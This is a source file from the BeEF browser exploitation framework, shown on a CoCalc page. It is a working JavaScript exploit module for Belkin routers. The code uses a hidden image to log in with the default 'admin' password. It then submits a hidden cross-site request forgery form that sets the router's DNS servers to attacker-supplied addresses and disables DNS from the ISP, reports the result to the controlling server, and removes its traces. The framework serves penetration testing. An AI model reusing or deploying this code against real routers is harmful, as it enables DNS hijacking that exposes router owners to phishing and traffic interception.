CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/router/belkin_dns_csrf/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
	// config
10
	var proto   = 'http'
11
	var rhost   = '<%= @rhost %>'; 
12
	var dns1    = '<%= @dns1 %>';
13
	var dns2    = '<%= @dns2 %>';
14
	var timeout = 15;
15

16
	// validate primary DNS server IP address
17
	if (!beef.net.is_valid_ip(dns1)) {
18
		beef.debug('Invalid Primary DNS server IP address was provided');
19
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
20
		return;
21
	}
22
	var parts = dns1.split('.');
23
	var dns1_1 = parts[0];
24
	var dns1_2 = parts[1];
25
	var dns1_3 = parts[2];
26
	var dns1_4 = parts[3];
27

28
	// validate secondary DNS server IP address
29
	if (!beef.net.is_valid_ip(dns2)) {
30
		beef.debug('Invalid Secondary DNS server IP address was provided');
31
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
32
		return;
33
	}
34
	var parts = dns2.split('.');
35
	var dns2_1 = parts[0];
36
	var dns2_2 = parts[1];
37
	var dns2_3 = parts[2];
38
	var dns2_4 = parts[3];
39

40
	// attempt auth with default password (admin)
41
	// incorrect login attempts do not log out an authenticated session
42
	var img = new Image();
43
	img.setAttribute("style", "visibility:hidden");
44
	img.setAttribute("width", "0");
45
	img.setAttribute("height","0");
46
	img.id = 'belkin_auth_<%= @command_id %>';
47
	img.src = proto + '://' + rhost + "/cgi-bin/login.exe?pws=admin";
48
	document.body.appendChild(img);
49

50
	// change DNS
51
	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(proto + '://' + rhost + '/cgi-bin/setup_dns.exe', "POST", "application/x-www-form-urlencoded", [
52
		{'type':'hidden', 'name':'dns1_1',   'value':dns1_1},
53
		{'type':'hidden', 'name':'dns1_2',   'value':dns1_2},
54
		{'type':'hidden', 'name':'dns1_3',   'value':dns1_3},
55
		{'type':'hidden', 'name':'dns1_4',   'value':dns1_4},
56
		{'type':'hidden', 'name':'dns2_1',   'value':dns2_1},
57
		{'type':'hidden', 'name':'dns2_2',   'value':dns2_2},
58
		{'type':'hidden', 'name':'dns2_3',   'value':dns2_3},
59
		{'type':'hidden', 'name':'dns2_4',   'value':dns2_4},
60
		{'type':'hidden', 'name':'dns2_1_t', 'value':dns2_1},
61
		{'type':'hidden', 'name':'dns2_2_t', 'value':dns2_2},
62
		{'type':'hidden', 'name':'dns2_3_t', 'value':dns2_3},
63
		{'type':'hidden', 'name':'dns2_4_t', 'value':dns2_4},
64
		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'} // disable dns from ISP
65
	]);
66

67
	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
68

69
	// clean up
70
	cleanup = function() {
71
		document.body.removeChild(belkin_iframe_<%= @command_id %>);
72
		document.body.removeChild(belkin_auth_<%= @command_id %>);
73
	}
74
	setTimeout("cleanup()", timeout*1000);
75

76
});
77

78

79
Product

Resources

Company
